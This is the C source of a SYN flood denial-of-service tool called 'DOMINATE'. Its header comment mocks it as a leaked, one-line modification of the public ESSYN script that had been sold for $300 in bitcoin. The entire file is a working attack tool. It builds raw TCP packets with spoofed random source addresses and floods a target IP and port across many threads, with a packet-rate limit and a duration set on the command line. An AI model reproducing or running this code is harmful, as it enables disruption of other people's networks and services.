1
/* "DOMINATE" Attack Script, this script was so difficult to make, it required taking the very public ESSYN
2
attack script, and replacing "tcph->res2 = 1;" to "tcph->res2 = 3;" in the "setup_tcp_header" function.
3
Anybody who purchased this script for $300 BTC, yup, it's literally changing a 1 to a 3.
4

5
Leaked / Made by Andy Quez, A real mexian hero.
6
*/
7
#include <unistd.h>
8
#include <time.h>
9
#include <sys/types.h>
10
#include <sys/socket.h>
11
#include <sys/ioctl.h>
12
#include <string.h>
13
#include <stdlib.h>
14
#include <stdio.h>
15
#include <pthread.h>
16
#include <netinet/tcp.h>
17
#include <netinet/ip.h>
18
#include <netinet/in.h>
19
#include <netinet/if_ether.h>
20
#include <netdb.h>
21
#include <net/if.h>
22
#include <arpa/inet.h>
23

24
#define MAX_PACKET_SIZE 4096
25
#define PHI 0x9e3779b9
26

27
static unsigned long int Q[4096], c = 362436;
28
static unsigned int floodport;
29
volatile int limiter;
30
volatile unsigned int pps;
31
volatile unsigned int sleeptime = 100;
32

33
void init_rand(unsigned long int x)
34
{
35
	int i;
36
	Q[0] = x;
37
	Q[1] = x + PHI;
38
	Q[2] = x + PHI + PHI;
39
	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
40
}
41
unsigned long int rand_cmwc(void)
42
{
43
	unsigned long long int t, a = 18782LL;
44
	static unsigned long int i = 4095;
45
	unsigned long int x, r = 0xfffffffe;
46
	i = (i + 1) & 4095;
47
	t = a * Q[i] + c;
48
	c = (t >> 32);
49
	x = t + c;
50
	if (x < c) {
51
		x++;
52
		c++;
53
	}
54
	return (Q[i] = r - x);
55
}
56
unsigned short csum (unsigned short *buf, int count)
57
{
58
	register unsigned long sum = 0;
59
	while( count > 1 ) { sum += *buf++; count -= 2; }
60
	if(count > 0) { sum += *(unsigned char *)buf; }
61
	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
62
	return (unsigned short)(~sum);
63
}
64

65
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
66

67
	struct tcp_pseudo
68
	{
69
		unsigned long src_addr;
70
		unsigned long dst_addr;
71
		unsigned char zero;
72
		unsigned char proto;
73
		unsigned short length;
74
	} pseudohead;
75
	unsigned short total_len = iph->tot_len;
76
	pseudohead.src_addr=iph->saddr;
77
	pseudohead.dst_addr=iph->daddr;
78
	pseudohead.zero=0;
79
	pseudohead.proto=IPPROTO_TCP;
80
	pseudohead.length=htons(sizeof(struct tcphdr));
81
	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
82
	unsigned short *tcp = malloc(totaltcp_len);
83
	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
84
	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
85
	unsigned short output = csum(tcp,totaltcp_len);
86
	free(tcp);
87
	return output;
88
}
89

90
void setup_ip_header(struct iphdr *iph)
91
{
92
	iph->ihl = 5;
93
	iph->version = 4;
94
	iph->tos = 0;
95
	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
96
	iph->id = htonl(54321);
97
	iph->frag_off = 0;
98
	iph->ttl = MAXTTL;
99
	iph->protocol = 6;
100
	iph->check = 0;
101
	iph->saddr = inet_addr("192.168.3.100");
102
}
103

104
void setup_tcp_header(struct tcphdr *tcph)
105
{
106
	tcph->source = htons(5678);
107
	tcph->seq = rand();
108
	tcph->ack_seq = 0;
109
	tcph->res2 = 3;
110
	tcph->doff = 5;
111
	tcph->syn = 1;
112
	tcph->window = htonl(65535);
113
	tcph->check = 0;
114
	tcph->urg_ptr = 0;
115
}
116

117
void *flood(void *par1)
118
{
119
	char *td = (char *)par1;
120
	char datagram[MAX_PACKET_SIZE];
121
	struct iphdr *iph = (struct iphdr *)datagram;
122
	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
123
	
124
	struct sockaddr_in sin;
125
	sin.sin_family = AF_INET;
126
	sin.sin_port = htons(floodport);
127
	sin.sin_addr.s_addr = inet_addr(td);
128

129
	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
130
	if(s < 0){
131
		fprintf(stderr, "Could not open raw socket.\n");
132
		exit(-1);
133
	}
134
	memset(datagram, 0, MAX_PACKET_SIZE);
135
	setup_ip_header(iph);
136
	setup_tcp_header(tcph);
137

138
	tcph->dest = htons(floodport);
139

140
	iph->daddr = sin.sin_addr.s_addr;
141
	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
142

143
	int tmp = 1;
144
	const int *val = &tmp;
145
	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
146
		fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
147
		exit(-1);
148
	}
149

150
	init_rand(time(NULL));
151
	register unsigned int i;
152
	i = 0;
153
	while(1){
154
		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
155

156
		iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
157
		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
158
		iph->check = csum ((unsigned short *) datagram, iph->tot_len);
159
		tcph->seq = rand_cmwc() & 0xFFFF;
160
		tcph->source = htons(rand_cmwc() & 0xFFFF);
161
		tcph->check = 0;
162
		tcph->check = tcpcsum(iph, tcph);
163
		
164
		pps++;
165
		if(i >= limiter)
166
		{
167
			i = 0;
168
			usleep(sleeptime);
169
		}
170
		i++;
171
	}
172
}
173
int main(int argc, char *argv[ ])
174
{
175
	if(argc < 6){
176
		fprintf(stderr, "Invalid parameters!\n");
177
		fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
178
		exit(-1);
179
	}
180

181
	fprintf(stdout, "Setting up Sockets...\n");
182

183
	int num_threads = atoi(argv[3]);
184
	floodport = atoi(argv[2]);
185
	int maxpps = atoi(argv[4]);
186
	limiter = 0;
187
	pps = 0;
188
	pthread_t thread[num_threads];
189
	
190
	int multiplier = 20;
191

192
	int i;
193
	for(i = 0;i<num_threads;i++){
194
		pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
195
	}
196
	fprintf(stdout, "Starting Flood...\n");
197
	for(i = 0;i<(atoi(argv[5])*multiplier);i++)
198
	{
199
		usleep((1000/multiplier)*1000);
200
		if((pps*multiplier) > maxpps)
201
		{
202
			if(1 > limiter)
203
			{
204
				sleeptime+=100;
205
			} else {
206
				limiter--;
207
			}
208
		} else {
209
			limiter++;
210
			if(sleeptime > 25)
211
			{
212
				sleeptime-=25;
213
			} else {
214
				sleeptime = 0;
215
			}
216
		}
217
		pps = 0;
218
	}
219

220
	return 0;
221
}
222